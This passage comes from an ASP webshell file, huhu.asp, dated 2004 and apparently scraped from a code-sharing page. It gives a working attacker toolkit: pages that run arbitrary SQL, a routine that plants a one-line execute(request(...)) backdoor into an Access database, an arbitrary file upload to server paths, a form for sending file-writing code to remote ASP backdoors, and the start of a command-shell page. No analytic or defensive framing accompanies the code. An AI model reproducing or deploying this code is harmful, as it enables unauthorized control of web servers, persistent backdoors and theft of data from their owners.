📄 huhu.asp
字号:
loopI=loopI+1
if loopI>sqlMaxLoopI then
exit do
end if
%>
<tr align="center" onmouseout="this.className='';" onmouseover="this.className='td';">
<td align="left"> <%=rsColumn("Column_Name")%></td>
<td width="80"><%=getDataType(rsColumn("Data_Type"))%></td>
<td width="70"><%=rsColumn("Character_Maximum_Length")%></td>
<td width="70"><%=rsColumn("Numeric_Precision")%></td>
<td width="70"><%=rsColumn("Is_Nullable")%></td>
<td width="80"><%=rsColumn("Column_Default")%></td>
</tr>
<%
rsColumn.moveNext
loop
%>
</table>
<%
rsTable.moveNext
loop
%>
</td>
</tr>
<tr align="right">
<td height="22" colspan="2" class="td">Powered By 蝴蝶 2004.11 </td>
</tr>
</table>
<%
conn.close
set conn=nothing
set rsTable=nothing
set rsColumn=nothing
end sub
sub showQuery()
dim i,j,rs,sql,page,conn,sqlStr,connStr,rsTable,tablesStr,theTable
sql=request("sql")
page=request("page")
sqlStr=request("sqlStr")
theTable=request("theTable")
if not isNumeric(page) or page="" then
page=1
end if
if sql="" and theTable<>"" then
sql="select top 10 * from ["&theTable&"]"
end if
if lcase(left(sqlStr,4))="sql:" then
connStr=mid(sqlStr,5)
else
connStr="Provider=Microsoft.Jet.Oledb.4.0;Data Source="&sqlStr
end if
set rs=server.createObject("adodb.recordSet")
set conn=server.createObject("adodb.connection")
on error resume next
conn.open connStr
chkErr err,"无法打开: "&sqlStr
set rsTable=conn.openSchema(20,array(empty,empty,empty,"table"))
do until rsTable.eof
tablesStr=tablesStr&"<br> <a href=""?pageName=sql&theAct=query&sqlStr="&encodeForUrl(sqlStr,false)&"&theTable="&encodeForUrl(rsTable("Table_Name"),false)&""">"&rsTable("Table_Name")&"</a>"
rsTable.moveNext
loop
%>
<br>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="22" colspan="2" align="center" class="td"><a href="?pageName=sql&theAct=query&sqlStr=<%=encodeForUrl(sqlStr,false)%>&sql=<%=enCodeForUrl(sql,false)%>">SQL命令执行及查看</a></td>
</tr>
<tr>
<td colspan="2" class="trHead"> </td>
</tr>
<form method="post" action="?pageName=sql&theAct=query&sqlStr=<%=encodeForUrl(sqlStr,false)%>">
<tr>
<td width="150" valign="top" class="td"><%=tablesStr%><br> <br> </td>
<td align="center" valign="top"><br>
<input name="sql" type="text" id="sql" value="<%=server.htmlEncode(sql)%>" size="60">
<input type="submit" name="Submit4" value="执行查询"> <br>
<%
if sql<>"" and left(lcase(sql),7)="select " then
rs.open sql,conn,1,1
chkErr err,encodeForUrl("错误信息: "&err.description,false)
rs.pageSize=20
if not rs.eof then
rs.absolutePage=page
end if
if rs.fields.count>0 then
echo "<br><table border=""1"" align=""center"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""tr"" colspan="""&rs.fields.count&""">SQL操作 - 执行结果</td>"
echo "</tr>"
echo "<tr>"
for j=0 to rs.fields.count-1
echo "<td height=""22"" align=""center"" class=""td""> "&rs.fields(j).name&" </td>"
next
for i=1 to 20
if rs.eof then
exit for
end if
echo "</tr>"
echo "<tr onmouseover=""javascript:this.className='td';"" onmouseout=""javascript:this.className='';"" valign=top>"
for j=0 to rs.fields.count-1
echo "<td height=""22"" align=""center"">"&server.htmlEncode(fixNull(rs(j)))&"</td>"
next
echo "</tr>"
rs.movenext
next
end if
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""td"" colspan="""&rs.fields.count&""">"
for i=1 to rs.pagecount
echo replace("<a href=""?pageName=sql&theAct=query&sqlStr="&encodeForUrl(sqlStr,false)&"&sql="&sql&"&page="&i&"""><font {$font"&i&"}>"&i&"</font></a> ","{$font"&page&"}","class=warningColor")
next
echo "</td></tr></table><br>"
rs.close
else
if sql<>"" then
on error resume next
conn.execute(sql)
chkErr err,encodeForUrl(err.description&sql,false)
echo "<center><br>执行完毕!</center>"
end if
end if
%>
</td>
</tr>
<tr align="right">
<td height="22" colspan="2" class="td">Powered By 蝴蝶 2004.11 </td>
</tr>
</form>
</table>
<br>
<%
conn.close
set rs=nothing
set conn=nothing
set rsTable=nothing
end sub
function getDataType(typeId)
select case typeId
case 130
getDataType="文本"
case 2
getDataType="整型"
case 3
getDataType="长整型"
case 7
getDataType="日期/时间"
case 5
getDataType="双精度型"
case 11
getDataType="是/否"
case 128
getDataType="OLE 对象"
case else
getDataType=typeId
end select
end function
sub accessInject()
dim rs,conn,sqlStr,connStr
sqlStr=request("sqlStr")
if lcase(left(sqlStr,4))="sql:" then
onErr("插入只对ACCESS数据库有效!")
else
connStr="Provider=Microsoft.Jet.Oledb.4.0;Data Source="&sqlStr
end if
set rs=server.createObject("adodb.recordSet")
set conn=server.createObject("adodb.connection")
on error resume next
conn.open connStr
chkErr err,"无法打开: "&sqlStr
if notdownloadsExists=true then
conn.execute("drop table notdownloads")
end if
conn.execute("create table notdownloads(notdownloads oleobject)")
rs.open "notdownloads",conn,1,3
rs.addnew
rs("notdownloads").appendchunk(chrB(asc("<"))&chrB(asc("%"))&chrB(asc("e"))&chrB(asc("x"))&chrB(asc("e"))&chrB(asc("c"))&chrB(asc("u"))&chrB(asc("t"))&chrB(asc("e"))&chrB(asc("("))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(asc(""""))&chrB(asc(clientPassword))&chrB(asc(""""))&chrB(asc(")"))&chrB(asc(")"))&chrB(asc("%"))&chrB(asc(">"))&chrB(asc(" ")))
rs.update
rs.close
echo "<script language=""javascript"">alert('插入成功!');history.back();</script>"
conn.close
set rs=nothing
set conn=nothing
end sub
sub pageUpload()
isIn(2)
dim theAct,thePath,fileName
theAct=request("theAct")
thePath=request("thePath")
fileName=request("fileName")
showTitle("其它操作页面")
if thePath="" then
thePath=server.mapPath(".")
end if
if theAct="upload" then
streamUpload thePath,fileName
echo "<script language=""javascript"">location.href='?pageName=upload';</script>"
end if
%>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<form method="post" enctype="multipart/form-data" action="?pageName=upload&theAct=upload&thePath=<%=encodeForUrl(thePath,false)%>" onsubmit="return upload_canSubmit(this);">
<tr>
<td height="22" class="td"> <%=request.serverVariables("server_name")%> - Adodb.Stream File Upload</td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="50" align="center" class="td">
<input name="file" type="file" size="30">
保存为
<input name="fileName" type="text" value="<%=thePath%>" size="40">
<input name="Submit" type="submit" id="Submit" value="上 传" onClick="this.form.action+='&theFile='+this.form.file.value+'&overWrite='+this.form.writeMode.checked;">
<input type="checkbox" name="writeMode" value="True">覆盖模式
</td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="22" align="right" class="td">Powered By <a href="javascript:;" title="QQ:89009628">Marcos</a> 2004.11 </td>
</tr>
</form>
</table>
<br>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="22" class="td"> <%=request.serverVariables("server_name")%>
- 数制转换</td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="50" align="center" class="td">
<input type=text name=text1 value=字符和数字转10和16进制 size=25 id=text9>
<input name="按钮" type=button onclick="main();" value="给我转"> <input type="text" name="vars" value=16进制转10进制和字符 size=25 id=vars2>
<input name="按钮2" type=button onClick="main2();" value="给我转"> </td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="22" align="right" class="td">Powered By 蝴蝶 2004.11 </td>
</tr>
</table>
<script language=vbs>
sub main()
base=document.all.text9.value
If IsNumeric(base) Then
cc=hex(cstr(base))
alert("10进制为"&base)
alert("16进制为"&cc)
exit sub
end if
aa=asc(cstr(base))
bb=hex(aa)
alert("10进制为"&aa)
alert("16进制为"&bb)
end sub
sub main2()
If document.all.vars.value<>"" Then
Dim nums,tmp,tmpstr,i
nums=document.all.vars.value
nums_len=Len(nums)
For i=1 To nums_len
tmp=Mid(nums,i,1)
If IsNumeric(tmp) Then
tmp=tmp * 16 * (16^(nums_len-i-1))
Else
If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then
alert("你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。")
exit sub
End If
tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))
End If
tmpstr=tmpstr+tmp
Next
alert("转换的10进制为:"&tmpstr&"其字符值为:"&chr(tmpstr))
End If
end sub
</script>
<br>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<form method="post" target="_blank">
<tr>
<td height="22" class="td"> <%=request.serverVariables("server_name")%>
- 海阳顶端网ASP后门执行 </td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="18" align="center" class="td"> 表单提交地址:
<input name="theAction" type="text" id="theAction" value="http://" size="50">
密码:
<input name="password" type="password" id="password" size="5">
<input name="Submit422" type="button" class="inputLogin" onClick="this.form.sharp.rows+=6;" value="+">
<input name="Submit42" type="button" class="inputLogin" onClick="if(this.form.sharp.rows>10){this.form.sharp.rows-=6;}" value="-">
</td>
</tr>
<tr>
<td align="center" class="td"> <textarea name="<%=clientPassword%>" id="sharp" cols="80" rows="10">echo "www.haiyangtop.net"
fsoSaveToFile "物理路径\文件名",request("fileContent")
sub fsoSaveToFile(thePath,fileContent)
dim fso,theFile
set fso=server.createObject("scripting.fileSystemObject")
set theFile=fso.openTextFile(thePath,2,true)
theFile.write fileContent
theFile.close
echo "文件保存成功!"
set fso=nothing
set theFile=nothing
end sub
sub echo(str)
response.write(str)
end sub</textarea>
<textarea name="fileContent" cols="80" rows="10" id="fileContent">fileContent</textarea> </td>
</tr>
<tr>
<td align="center" class="td">
<input type="submit" name="Submit3" value="提 交" onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.form.theAction.value;">
<input type="reset" name="Submit32" value="重 置">
<input type="button" name="Submit4" value="提 示" onClick="alert('上面的文本框用来放要执行的代码\n下面的文本框用来传递其它数据\n下面的文本框的名字是fileContent');"> </td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="22" align="right" class="td">Powered By <a href="javascript:;" title="QQ:89009628">Marcos</a> 2004.11 </td>
</tr>
</form>
</table>
<br>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<form>
<tr>
<td height="22" class="td"> <%=request.serverVariables("server_name")%>
- 网页代码常用加解密</td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="250" align="center" class="td">
<textarea cols=80 name=Word onChange=SetWords(this) rows=6></textarea>
<br>
<input name=encode onClick=SetNewWords1(this.form) type=button value="Escape加密">
<INPUT name=uncode onclick=SetNewWords(this.form) type=button value="Escape解密">
<input type="button" name="Submit2" value="Encode加密" onclick="this.form.NewWords.value=screncode(this.form.Word.value,'JS')">
<input type="button" name="Submit2" value="Encode解密" onclick="this.form.NewWords.value=strdec(this.form.Word.value)">
<br>
<textarea cols=80 name=NewWords rows=6></textarea>
</td>
</tr>
</form>
<tr>
<td class="trHead"> </td>
</tr>
<tr>
<td height="22" align="right" class="td">Powered By <a href="javascript:;" title="QQ:26696782">Marcos</a> 2004.11 </td>
</tr>
</table>
<%
showExecuteTime()
end sub
sub pageCmdShell()
isIn(2)
dim cmdStr,cmdPath,cmdResult
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -